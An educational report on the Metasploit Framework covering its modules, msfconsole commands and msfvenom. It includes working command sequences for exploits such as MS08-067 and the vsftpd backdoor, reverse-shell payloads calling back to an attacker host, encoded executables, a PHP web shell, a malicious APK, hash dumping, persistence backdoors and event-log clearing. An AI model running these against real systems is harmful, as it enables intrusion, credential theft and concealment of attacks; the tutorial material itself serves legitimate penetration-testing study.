METASPLOIT

An In-Depth Analysis of the Metasploit

Introduction
The Metasploit Framework, created by H.D. Moore in 2003, is one of the most recognized tools
in the cybersecurity industry. It is an open-source project that has evolved from a simple
network tool to a comprehensive platform for penetration testing, vulnerability research, and
exploit development. This report provides an in-depth analysis of the Metasploit Framework, its
interfaces, modules, basic commands, and the MSFvenom tool. Each section will be supported
by references to authoritative sources in the field.
What is Metasploit Framework?
The Metasploit Framework is a modular platform that enables security professionals and ethical
hackers to simulate cyberattacks in a controlled environment. It allows users to exploit
vulnerabilities in a variety of systems, including web applications, databases, operating systems,
and network devices. The framework's open-source nature ensures that it is continuously
updated with new exploits, payloads, and auxiliary tools, making it an invaluable resource for
security assessments.
Key Features and Capabilities
1. Exploit Development: Metasploit contains a vast repository of exploits that target
specific vulnerabilities in software and hardware. These exploits are regularly updated
to include the latest threats.
2. Payload Delivery: The framework allows for the seamless delivery of payloads, which
are codes executed on a target machine once an exploit has been successfully launched.
3. Post-Exploitation: After gaining access to a system, Metasploit provides a range of tools
for maintaining control, gathering further information, and escalating privileges.
4. Integration: Metasploit integrates with other tools and services such as vulnerability
scanners, providing a streamlined workflow for penetration testing.

Overview of Metasploit Interfaces and Modules

The Metasploit Framework provides multiple interfaces, each tailored to different user needs
and environments. It also features a modular architecture that allows users to combine
different components for customized attacks.
Metasploit Interfaces
1. msfconsole: The most commonly used interface, msfconsole, is a powerful command-
line interface (CLI) that supports a wide range of commands, making it suitable for both
 beginners and advanced users. It allows for the automation of tasks through scripting
and offers logging capabilities.

2. msfcli: Although deprecated, msfcli provides a quick way to execute individual exploits
with specified parameters directly from the command line. It is less versatile than
msfconsole but was historically used for straightforward tasks. It was discontinued in
2015.
3. Armitage: Armitage is a graphical user interface (GUI) that simplifies the penetration
testing process by offering a visual representation of the target environment. It is
particularly useful for team-based penetration testing, as it supports collaborative
efforts.
 4. Web Interface: The web-based GUI of Metasploit allows users to interact with the
framework via a browser, offering similar functionalities to msfconsole. This interface is
beneficial for remote access and management.

Metasploit Modules
Metasploit's modular design is one of its most powerful features, enabling users to mix and
match different components to achieve specific objectives.
Auxiliary Modules
Auxiliary modules are components within penetration testing frameworks (like Metasploit) that
provide additional functionality beyond exploiting vulnerabilities. They are often used to
perform tasks such as scanning, enumeration, and gathering information on a target system.
Unlike exploit modules, auxiliary modules are typically non-invasive and do not aim to gain
control over the target.
KEY FUNCTIONS OF AUXILIARY MODULES
1. Scanning
o Port Scanning: Identify open ports on a target system.
o Vulnerability Scanning: Detect potential vulnerabilities in the target system.
2. Enumeration
o Service Enumeration: Gather detailed information about services running on the
target.
o User Enumeration: Identify valid user accounts on a system.
 3. Information Gathering
o Banner Grabbing: Capture banners from services to identify software versions.
o Network Mapping: Create a map of the network topology.
4. DoS (Denial of Service)
o Some auxiliary modules can be used to perform DoS attacks to test the resilience
of services under stress.
5. Brute Forcing
o Attempt to gain unauthorized access to systems by systematically trying
different passwords.
6. Exploitation
o While less common, some auxiliary modules can help set up conditions for future
exploitation, such as creating specific network traffic or interacting with APIs.
EXAMPLES
 use auxiliary/scanner/portscan/tcp: A module to perform TCP port scanning.

 use auxiliary/scanner/http/http_version: A module to determine the version of the

HTTP server running on a target.

 auxiliary/gather/ldap_query: A module to query information from LDAP directories.

Encoder Module
Encoder modules are specialized components within penetration testing frameworks, like
Metasploit, used to encode payloads to evade detection by security mechanisms such as
antivirus software, intrusion detection systems (IDS), and firewalls. They work by transforming
the payload into a different format that is harder for these security tools to recognize, without
altering the payload's functionality.
KEY FUNCTIONS OF ENCODER MODULE
1. Evading Detection:
Encoders modify the payload to avoid signature-based detection mechanisms. Security
tools often rely on known patterns (signatures) to detect malicious code, and encoding
the payload changes its appearance, helping it bypass these defenses.
2. Obfuscation
 Encoders can obfuscate the payload by converting it into a different format, making it
more difficult for reverse engineers or automated analysis tools to understand or detect
the malicious intent.
3. Format Transformation
Some encoders change the payload's format to ensure it remains functional within
specific environments. For instance, converting a binary payload into a format that can
be safely transmitted over a text-based protocol.
4. Payload Size Management
Encoders might slightly alter the size of the payload to fit within certain constraints,
though this is less common than the other functions.

COMMON ENCODER MODULES IN METASPLOIT

 x86/shikata_ga_nai: One of the most popular encoders that uses polymorphic
techniques to create an encoded payload that changes its signature with each
encoding, making it very effective at evading detection.
 x86/bloxor: An encoder that is used for specific scenarios where a payload needs to fit
into a small space or bypass certain restrictions.
 cmd/echo: An encoder that converts a payload into a format suitable for insertion into
a shell command using echo.
Evasion Modules
In Metasploit, evasion modules are used to help penetration testers and red teamers bypass
security mechanisms like antivirus software, IDS/IPS, and firewalls. These modules manipulate
payloads and network traffic to make them less detectable by security defenses, allowing
testers to simulate advanced attack scenarios.
FUNCTIONS OF EVASION MODULE
1. Payload Encoding and Obfuscation:
o Purpose: Encode or obfuscate the payload to avoid detection by security
software.
o Example: Using a polymorphic encoder to change the appearance of the payload
each time it is deployed, making it difficult for signature-based detection tools to
recognize it.
2. Traffic Manipulation:
o Purpose: Modify network traffic to evade detection by IDS/IPS.
o Example: Fragmenting payloads or using alternate protocols (like HTTPS instead
of HTTP) to disguise malicious traffic as legitimate.
3. Process Injection and Migration:
 o Purpose: Inject the payload into a legitimate process or migrate to another
process to avoid detection by antivirus or other monitoring tools.
o Example: After exploitation, the payload can automatically migrate to a well-
known system process like explorer.exe, making it harder for security tools to
identify and terminate it.
4. Protocol Evasion:
o Purpose: Use protocols that are less likely to be scrutinized by security systems
to communicate with the target.
o Example: Using DNS tunneling or HTTPS to bypass network filtering mechanisms
that might block more suspicious protocols.
5. Timing Evasion:
o Purpose: Alter the timing of an attack to avoid triggering security systems that
monitor for rapid or unusual activity.
o Example: Introducing delays between actions or spreading the attack over a
longer period to avoid detection.
6. File and Memory Evasion:
o Purpose: Avoid leaving traces on disk or in memory that could be detected by
forensic tools.
o Example: Running the payload entirely in memory without writing anything to
the disk to evade file-based detection mechanisms.
EXAMPLES
1. Load the Module:
o use exploit/windows/local/bypassuac

2. Set the Payload:

o set payload windows/meterpreter/reverse_tcp

3. Configure the Target:

o Set the target IP address and other relevant options.
4. Execute the Exploit:
o Exploit
o The module will attempt to bypass UAC on the target system and execute the
Meterpreter payload with elevated privileges.
Exploit Modules
Exploit modules in Metasploit are tools used to take advantage of vulnerabilities in software,
systems, or networks to gain unauthorized access, execute code, or perform other malicious
actions. These modules are at the core of Metasploit's functionality and are crucial for
penetration testing and ethical hacking.
FUNCTIONS OF EXPLOIT MODULES:
1. Exploitation:
o Purpose: Exploit modules are designed to leverage a specific vulnerability in a
target system to execute arbitrary code, gain access, or perform other
unauthorized actions.
o Example: Exploiting a buffer overflow vulnerability to execute shellcode on a
target system/.
2. Privilege Escalation:
o Purpose: Exploit modules can be used to elevate privileges on a target system,
gaining higher-level access, such as root or administrative rights.
o Example: Exploiting a local privilege escalation vulnerability in Windows to gain
SYSTEM-level access.
3. Remote Code Execution (RCE):
o Purpose: These modules exploit vulnerabilities that allow attackers to execute
arbitrary code on a remote system.
o Example: Exploiting a vulnerability in a web server to upload and execute a
reverse shell.
4. Denial of Service (DoS):
o Purpose: Some exploit modules are designed to crash or disable a service or
system, rendering it unavailable.
o Example: Exploiting a vulnerability in a network service to cause it to crash,
denying service to legitimate users.
5. Post-Exploitation:
o Purpose: After successful exploitation, modules can be used for further actions
like creating persistent backdoors, gathering information, or spreading to other
systems.
o Example: Exploiting a system to install a persistent backdoor that allows
continuous access even after the system is patched.
EXAMPLES OF EXPLOIT MODULE OF METASPLOIT
1. exploit/windows/smb/ms08_067_netapi
Function: Exploits a vulnerability in the Microsoft Windows Server service that allows
remote code execution.
 Vulnerability: MS08-067, a critical vulnerability in the Server Message Block (SMB)
protocol on Windows systems.
Example Usage:
Load the module: use exploit/windows/smb/ms08_067_netapi
Set the payload: set payload windows/meterpreter/reverse_tcp
Configure target options: set RHOST <target_ip>
set LHOST <your_ip>
Execute the Exploit: exploit

2. exploit/unix/ftp/vsftpd_234_backdoor
Function: Exploits a backdoor vulnerability in vsftpd 2.3.4, a popular FTP server
Vulnerability: The vsftpd 2.3.4 version has a backdoor that allows attackers to spawn a
root shell.
Example Usage:
Load the Module: use exploit/unix/ftp/vsftpd_234_backdoor
Set Target Options: set RHOST <target_ip>
Execute the Exploit: exploit

NOP Modules
In Metasploit, NOP (No Operation) modules, or simply "NOP generators," are used to create
NOP sleds, which are sequences of NOP instructions. These instructions do nothing and are
typically used in exploit payloads to provide padding, ensuring that the exploit successfully
lands on the shellcode.
FUNCTIONS OF NOP MODULES
1. Padding:
o Purpose: NOP sleds are used to pad the exploit payload. This is particularly
useful in buffer overflow attacks, where the exact location of the shellcode in
memory is uncertain.
o How it Works: A NOP sled provides a safe zone in memory that the program’s
instruction pointer can land on, eventually sliding down into the actual
shellcode.
2. Increased Exploit Reliability:
o Purpose: By adding NOP instructions before the shellcode, the chance of the
exploit working increases, even if the exact memory address of the shellcode
isn’t known.
o How it Works: The NOP sled allows the instruction pointer to "slide" into the
shellcode regardless of slight variations in memory addresses.
3. Evasion:
o Purpose: NOPs can also be used to obfuscate the payload, making it harder for
signature-based detection systems to recognize the exploit.
o How it Works: In some cases, non-standard NOPs or randomized sequences of
NOP-like operations are used to avoid detection.

EXAMPLES OF NOP MODULES IN METASPLOIT

Metasploit provides several NOP generators that can be used in different scenarios. Here are
some examples:
1. nop/x86/opty2
Function: Generates an optimized NOP sled for x86 architecture.
Usage:
o This NOP generator creates a more optimized NOP sled that includes various x86
instructions that do not affect the program's state but offer better evasion and
randomness compared to traditional NOP (0x90) instructions.
o Example: When crafting an exploit payload for an x86 system, you might choose
this NOP generator to increase the reliability and evade basic detection
mechanisms.

2. nop/x86/single_byte
Function: Generates a standard NOP sled using the single-byte NOP instruction (0x90)
for x86 architecture.
Usage:
 o This is the most straightforward NOP generator, simply padding the payload with
0x90 instructions. It’s commonly used in simple buffer overflow exploits.
o Example: If you're writing an exploit and need to add some padding before your
shellcode, you would use this NOP generator to create a NOP sled.
o Command: set NOP nop/x86/single_byte
3. nop/x86/mixed
Function: Generates a NOP sled with mixed instructions for x86 architecture.
o This generator creates a NOP sled by using a mixture of different NOP-like
instructions, which can evade simple signature detection.
o Example: Use this NOP generator when you want to avoid detection by security
tools that might be looking for a standard sequence of 0x90 NOPs.
o Command: set NOP nop/x86/mixed
4. nop/x64/simple
Function: Generates a simple NOP sled for x64 architecture.
Usage:
o Similar to the x86 single-byte NOP generator, this module creates a basic NOP
sled for x64 systems, using 0x90 instructions.
o Example: When creating an exploit payload for a 64-bit system, you can use this
NOP generator to ensure the payload lands correctly in memory.
o Command: set NOP nop/x64/simple
HOW TO USE NOP MODULES IN METASPLOIT
When crafting a payload in Metasploit, you can specify the NOP generator to use with the set
NOP command. Here’s a general workflow:
1. Select an Exploit:
o Choose the exploit module you want to use.
o Command: use exploit/windows/smb/ms08_067_netapi
2. Set the Payload:
o Choose the payload you want to deliver.
o Command: set payload windows/meterpreter/reverse_tcp
3. Select the NOP Generator:
o Specify which NOP module to use.
o Command: set NOP nop/x86/opty2
4. Configure Other Options:
Set target options like RHOST, LHOST, and any additional settings required by the
exploit.
5. Run the Exploit:
Launch the exploit, which will use the specified NOP generator to pad the payload.
Command: exploit
Payload Module
In Metasploit, payload modules are components that get executed after a vulnerability has
been successfully exploited. They are the final stage of an attack and are responsible for
delivering the actual code that will run on the target system. Payloads can perform a variety of
tasks, from opening a remote shell to uploading and executing additional files.
FUNCTIONS OF PAYLOAD MODULE
1. Remote Access:
Purpose: Payloads can provide an attacker with remote access to the target system,
often through a shell or Meterpreter session.
How it Works: Once the exploit successfully runs, the payload opens a communication
channel (such as a reverse TCP connection) back to the attacker's machine, allowing
remote control.
2. Data Exfiltration:
Purpose: Some payloads are designed to extract data from the target system, such as
passwords, files, or other sensitive information.
How it Works: The payload may gather data and either send it back to the attacker or
store it on the compromised system for later retrieval.
3. Privilege Escalation:
Purpose: Payloads can be used to elevate privileges on the target system, allowing the
attacker to gain more control.
How it Works: After initial access, the payload might attempt to exploit additional
vulnerabilities or leverage system misconfigurations to gain administrative or root
access.
4. Persistence:
Purpose: Payloads can establish a persistent backdoor on the target system, allowing
the attacker to regain access even after the system is rebooted or patched.
How it Works: The payload may install a service, modify startup scripts, or create
scheduled tasks that automatically run when the system starts.
5. Destruction:
Purpose: In some cases, payloads are used to destroy data, disrupt operations, or
render the target system unusable.
How it Works: A destructive payload might delete critical files, overwrite system
binaries, or corrupt the operating system.
TYPES OF PAYLOADS IN METASPLOIT
Metasploit offers various types of payloads, each with specific functionality:
1. Singles:
Description: Self-contained payloads that perform a single action and do not require
further interaction.
 Example: A payload that simply adds a user to the system or opens a reverse shell.
2. Stagers:
Description: Small payloads designed to establish a connection to the attacker’s
machine and then download a larger payload (the stage).
Example: A reverse TCP stager that connects back to the attacker and downloads the
Meterpreter payload.
3. Stages:
Description: Larger payloads that are downloaded and executed by the stager. These
are often more complex and provide additional functionality.
Example: The Meterpreter shell, which provides extensive post-exploitation capabilities.
EXAMPLES OF PAYLOAD MODULES IN METASPLOIT
1. windows/meterpreter/reverse_tcp
Function: This payload opens a Meterpreter session on the target system and connects
back to the attacker’s machine over TCP.
Usage:
o Exploit: This payload is often used with exploits targeting Windows systems.
o Example Command:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set RHOST <target_ip>
exploit
o Result: If successful, a Meterpreter session is opened, providing full control over
the target system.

2. linux/x86/shell/reverse_tcp
Function: This payload opens a simple command shell on a Linux system and connects it
back to the attacker over TCP.
Usage:
o Exploit: Typically used with exploits targeting Linux systems.
o Example Command:
 use exploit/linux/http/cups_bash_env_exec
set payload linux/x86/shell/reverse_tcp
set LHOST <your_ip>
set RHOST <target_ip>
exploit
o Result A reverse shell is opened on the target system, allowing the attacker to
execute commands remotely.
3. windows/adduser
Function: This single payload adds a new user to the target Windows system.
Usage:
o Exploit: Can be used in scenarios where adding a user is sufficient for further
access or to leave a persistent backdoor.
o Example Command:
use exploit/windows/smb/ms08_067_netapi
set payload windows/adduser
set USER <username>
set PASS <password>
set RHOST <target_ip>
exploit
o Result: A new user is added to the target system, which the attacker can use to
log in later.

4. android/meterpreter/reverse_tcp
Function: This payload opens a Meterpreter session on an Android device and connects
back to the attacker’s machine.
Usage:
o Exploit: Used in attacks targeting Android devices, often delivered through social
engineering or malicious apps.
o Example Command:
use exploit/android/browser/webview_addjavascriptinterface
set payload android/meterpreter/reverse_tcp
 set LHOST <your_ip>
set RHOST <target_ip>
exploit
o Result: A Meterpreter session is opened on the target Android device, giving the
attacker control.

5. cmd/unix/reverse_bash
Function: This payload opens a reverse Bash shell on a Unix-based system.
Usage:
o Exploit: Used with exploits targeting Unix or Linux systems where a simple Bash
shell is sufficient.
o Example Command:
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set LHOST <your_ip>
set RHOST <target_ip>
exploit
o Result: A reverse Bash shell is opened, allowing the attacker to execute
commands on the target system.
POST Module
In Metasploit, post-exploitation modules, commonly referred to as post modules, are used
after a successful exploitation to perform various tasks on the compromised system. These
tasks can include gathering information, escalating privileges, maintaining persistence, or
cleaning up traces of the attack. Post modules are designed to be executed on a system where
you already have a session, such as a Meterpreter session.
FUNCTIONS OF POST MODULES
1. Information Gathering:
Purpose: Collect detailed information about the compromised system, such as network
configuration, installed software, user credentials, and more.
How it Works: The post module queries the system for specific information, which can
be used to further the attack or for reporting purposes.
Example: Enumerating logged-in users or gathering password hashes.
2. Privilege Escalation:
Purpose: Elevate the attacker’s privileges on the compromised system to gain more
control and access restricted areas.
How it Works: The post module may exploit local vulnerabilities, abuse
misconfigurations, or leverage cached credentials to escalate privileges.
Example: Escalating from a standard user account to an administrative or root account.
3. Persistence:
Purpose: Establish a method for the attacker to regain access to the compromised
system, even after a reboot or system update.
How it Works: The post module installs backdoors, creates scheduled tasks, or modifies
system startup scripts to ensure continued access.
Example: Installing a persistent Meterpreter service.
4. Credential Dumping:
Purpose: Extract stored credentials from the compromised system for further use in
lateral movement or other attacks.
How it Works: The post module searches for credentials stored in memory,
configuration files, or other locations and extracts them.
Example: Dumping password hashes from the Windows SAM database.
5. Cleanup:
Purpose: Remove traces of the attack from the compromised system to avoid detection
by the system owner or forensic investigators.
How it Works: The post module may delete logs, remove payloads, or undo changes
made during the attack.
Example: Clearing event logs or removing uploaded files.
 6. Pivoting:
Purpose: Use the compromised system as a bridge to access other systems within the
same network that may not be directly accessible.
How it Works: The post module sets up routes or proxies through the compromised
system to access internal network resources.
Example: Setting up a SOCKS proxy through the compromised system to scan the
internal network.
EXAMPLES OF POST MODULE IN METASPLOIT
1. post/windows/gather/enum_logged_on_users
Function: Enumerates users currently logged onto the compromised Windows system.
Usage: This module collects information about currently logged-in users, which can help in
understanding who is active on the system and identifying potential targets for further
exploitation
Example Command:
use post/windows/gather/enum_logged_on_users
set SESSION <session_id>
run
Result: A list of currently logged-on users is displayed.
2. post/multi/gather/hashdump
Function: Dumps password hashes from the SAM database on Windows systems.
Usage: After gaining access to a Windows system, this module can be used to extract password
hashes, which can then be cracked offline or used for pass-the-hash attacks.
Example Command:
use post/multi/gather/hashdump
set SESSION <session_id>
run
Result: Password hashes are extracted and displayed.
3. post/windows/manage/persistence
Function: Creates a persistent backdoor on the compromised Windows system.
Usage:
This module can be used to install a backdoor that survives reboots, ensuring that the attacker
can regain access to the system at a later time.
Example Command:
use post/windows/manage/persistence
set SESSION <session_id>
set LHOST <your_ip>
set LPORT <your_port>
run
Result: A persistent backdoor is installed on the target system.
 4. post/linux/gather/enum_network
Function: Gathers network information from the compromised Linux system.
Usage: This module collects detailed network configuration information, including IP addresses,
routing tables, and DNS settings, which can be useful for further network attacks.
Example Command:
use post/linux/gather/enum_network
set SESSION <session_id>
run
Result: Network configuration details are displayed.
5. post/windows/manage/clearlogs
Function: Clears the event logs on the compromised Windows system.
Usage: This module is used to remove evidence of the attack by clearing the system, application,
and security event logs.
Example Command:
use post/windows/manage/clearlogs
set SESSION <session_id>
run
Result: All event logs on the target system are cleared.

HOW TO USE POST MODULES IN METASPLOIT

1. Obtain a Session:
o Ensure you have an active session, such as a Meterpreter session, on the target system.
o Example:
sessions -i 1
2. Select a Post Module:
o Choose a post module that suits your objectives (e.g., gathering information, dumping
credentials).
o Example:
use post/windows/gather/enum_logged_on_users
3. Set the Session:
o Specify the session ID of the compromised system where the post module will run.
o Example:
set SESSION 1
4. Configure Additional Options:
o Set any additional options required by the module (e.g., LHOST, LPORT).
o Example:
set LHOST 192.168.1.100
5. Run the Module:
o Execute the post module to perform the desired action.
o Example :
run
Explanation of Basic Commands in Metasploit
Understanding the basic commands in Metasploit is crucial for effectively utilizing the
framework. Below are some essential commands and their explanations:
1. SEARCH
The `search` command is used to locate specific modules in the Metasploit database.
Users can search by various criteria, including the module name, description, and CVE
identifiers.
Example: `search smb`

2. USE
The `use` command allows the user to select a specific module to work with. Once
selected, the module can be configured and executed.
Example: `use exploit/windows/smb/ms17_010_eternalblue`
3. SHOW OPTIONS
This command displays all configurable options for the currently selected module,
including required and optional parameters.
Example: `show options`

4. SET
The `set` command is used to assign values to the options displayed by `show options`.
It is crucial for configuring the module to target specific systems or networks.
Example: `set RHOST 192.168.1.10`

5. RUN or EXPLOITS
These commands execute the module with the configured options. The `run` command
is generally used for auxiliary modules, while `exploit` is used for exploit modules.
Example: `exploit`
6. CONNECT
There is a miniature Netcat clone built into the msfconsole that supports SSL, proxies,
pivoting, and file transfers. By issuing the connect command with an IP address and port
number, you can connect to a remote host from within msfconsole.
7. SESSIONS
The `sessions` command manages active sessions. It allows users to list, interact with, or
terminate sessions opened by payloads such as Meterpreter.

8. GREP
The grep command is similar to Linux grep. It matches a given pattern from the output
of another msfconsole command.

9. INFO
The info command will provide detailed information about a particular module including
all options, targets, and other information. Be sure to always read the module
description prior to using it as some may have un-desired effects.
10. IRB
Running the irb command will drop you into a live Ruby interpreter shell where you can
issue commands and create Metasploit scripts on the fly. This feature is also very useful
for understanding the internals of the Framework.

11. JOBS
Jobs are modules that are running in the background. The jobs command provides the
ability to list and terminate these jobs.

12. HELP
If you type the help command on the console, it will show you a list of core commands
in Metasploit along with their description.
13. LOAD
The load command loads a plugin from Metasploit’s plugin directory. Arguments are
passed as key=val on the shell.

14. RESOURCE
The resource command runs resource (batch) files that can be loaded through
msfconsole.

15. EXIT
The `exit` command closes the Metasploit console.
MSFvenom
msfvenom is a powerful command-line tool that is part of the Metasploit Framework. It is
used to generate payloads, encode them, and create various types of files, such as executables,
shellcode, and scripts, that can be used in exploitation or post-exploitation activities.
Essentially, msfvenom combines the functionality of the old msfpayload and msfencode
tools into a single tool, making it easier to generate and manipulate payloads .

KEY FUNCTIONS OF msfvenom

1. Payload Generation:
Purpose: Create a payload that can be used in an exploit to gain access to a target
system.
How it Works: msfvenom allows you to select from a wide variety of payloads, which
can be configured with different options such as the attacker's IP address (LHOST) and
port (LPORT).
Example: Generating a reverse shell payload for Windows.

2. Encoding Payloads:
Purpose: Encode a payload to evade detection by security tools, such as antivirus
software.
How it Works: msfvenom can apply various encoders to the payload, obfuscating it to
make it harder for signature-based detection mechanisms to recognize the malicious
code.
Example: Encoding a payload with the x86/shikata_ga_nai encoder.
3. Creating Standalone Exploit Files:
Purpose: Generate an executable file, script, or other file types that contain the payload,
which can be delivered to the target system.
How it Works: msfvenom allows you to specify the output format of the payload,
creating files such as .exe, .elf, .apk, or even raw shellcode.
Example: Creating a Windows executable that contains a reverse TCP shell payload.
4. Combining Payloads and Exploits:
Purpose: Combine a payload with an exploit to create a single file that can be used in a
social engineering attack or other exploitation methods.
 How it Works: You can choose a payload and a specific exploit, such as a buffer
overflow, and package them together into a single file.
Example: Generating an infected PDF or Word document.
COMMON USAGE SCENARIOS & EXAMPLES
1. Generating a Reverse TCP Shell for Windows:
Command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f
exe -o shell_reverse_tcp.exe
Explanation:
o -p windows/meterpreter/reverse_tcp: Specifies the payload (a
reverse TCP Meterpreter shell for Windows).
o LHOST=192.168.1.100: Sets the attacker's IP address.
o LPORT=4444: Sets the port on the attacker's machine to listen for the
connection.
o -f exe: Specifies the output format as a Windows executable.
o -o shell_reverse_tcp.exe: Defines the output file name.
2. Encoding a Payload with Shikata Ga Nai:
Command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e
x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe
Explanation:
o -e x86/shikata_ga_nai: Uses the Shikata Ga Nai encoder.
o -i 5: Specifies the number of iterations (how many times to encode the
payload).
o The rest of the options are similar to the previous example.

3. Creating a Payload in Raw Format for Use in Exploits:

Command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f
raw -o shell.raw
Explanation:
o -f raw: Outputs the payload in raw binary format, which can be used in
custom exploit code.
4. Generating a PHP Web Shell:
Command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -
o shell.php
Explanation:
 o -p php/meterpreter_reverse_tcp: Specifies a reverse TCP
Meterpreter payload for PHP.
o -f raw: Outputs the payload in raw format, suitable for use as a .php file.
5. Creating a Malicious APK for Android:
Command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o
evil.apk
Explanation:
o -p android/meterpreter/reverse_tcp: Specifies a reverse TCP
Meterpreter payload for Android.
o -o evil.apk: Outputs the payload as an Android APK file.

COMBINING msfvenom WITH METASPLOIT

After generating a payload with msfvenom, you can use the Metasploit Framework to handle
the incoming connection from the target system. Here's how you can set it up:
1. Start Metasploit:
Open Metasploit using the command: msfconsole
2. Set Up a Listener:
Use the following commands to set up a listener for the reverse shell:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit
This sets up Metasploit to listen for the connection initiated by the payload.
3. Deliver the Payload:
Deliver the generated payload (e.g., shell_reverse_tcp.exe) to the target
system. Once executed on the target, the payload will connect back to the Metasploit
listener, giving you control over the target system.
CONCLUSION
The Metasploit Framework is a cornerstone of modern penetration testing and vulnerability
assessment. Its modular architecture, coupled with powerful tools like MSFvenom, makes it an
indispensable resource for security professionals. By understanding the various interfaces,
modules, and commands, users can harness the full potential of Metasploit to simulate and
defend against real-world cyber threats.

References
o Bejtlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident
Detection and Response. No Starch Press.
o McClure, S., Scambray, J., & Kurtz, G. (2012). Hacking Exposed 7: Network Security
Secrets and Solutions. McGraw-Hill.
o Lyon, G. (2009). Nmap Network Scanning: The Official Nmap Project Guide to Network
Discovery and Security Scanning. Insecure.Com LLC.
o https://www.metasploit.com
o Andress, J., & Winterfeld, S. (2013). Cyber Warfare: Techniques, Tactics, and Tools for
Security Practitioners. Elsevier.
o https://www.offsec.com/metasploit-unleashed/msfconsole-commands/
o https://docs.rapid7.com/metasploit/metasploit-web-interface-overview/
o https://www.comparitech.com/net-admin/metasploit-cheat-sheet/
o https://docs.metasploit.com/docs/modules.html#encoder-modules-47